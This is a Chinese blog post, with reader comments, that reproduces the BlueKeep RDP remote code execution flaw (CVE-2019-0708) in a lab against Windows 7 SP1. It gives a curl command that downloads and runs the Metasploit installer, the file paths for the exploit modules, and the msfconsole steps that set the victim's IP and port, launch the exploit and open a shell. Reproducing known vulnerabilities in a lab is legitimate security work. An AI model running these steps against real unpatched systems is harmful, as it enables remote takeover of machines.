CVE-2019-0708—微软RDP远程桌面代码执行漏洞复现

  • 内容
  • 相关

0x01 

2019年9月7日凌晨,msf上更新了0708的漏洞利用程序。

顿时安全群和朋友圈就爆炸了

-

奈何接到HW攻击队任务,又在家过了个中秋,0809才在今天更新。

0x02 环境

Windows 7 sp1

Kali

exp

0x02 利用

1.一键安装metasploit-framework

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

2.下载Reference中的攻击套件放置文件到msf的相应文件夹

rdp.rb   ->   /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb   ->   /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb   ->   /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb   ->   /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

msf命令:

使用msfconsole进入metasploit-framework ,reload_all重新加载0708rdp利用模块

Image

使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce启用0708RDP攻击模块

Image

使用set RHOSTS 设置受害机IP

Image

使用set RPORT 设置受害机RDP端口号

Image

使用set target ID数字(可选为0-4)设置受害机机器架构

我使用的是Parallels Desktop,设置target 1

Image

使用exploit开始攻击,等待建立连接

Image

建立连接以后,使用shell获得shell,再使用python获得交互式shell,执行whoami

Image

本文标签:

版权声明:若无特殊注明,本文皆为《舜哥哥吖》原创,转载请保留文章出处。

本文链接:CVE-2019-0708—微软RDP远程桌面代码执行漏洞复现 - http://www.shungg.cn/post/248

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论

3条评论
  1. avatar

    Kevin Lv.1 Firefox 69.0 Firefox 69.0 Windows Windows 回复

    复现了,谢谢。

    山东省 联通

    1. avatar

      Agan999 Lv.1 Chrome 76.0.3809.132 Chrome 76.0.3809.132 Windows 7 x64 Edition Windows 7 x64 Edition 回复

      看了博客,又看了github学习了。成功了。

      山东省 联通

      1. avatar

        TR Lv.1 Chrome 76.0.3809.132 Chrome 76.0.3809.132 Windows 7 Windows 7 回复

        感谢大佬,复现成功了。

        陕西省西安市 电信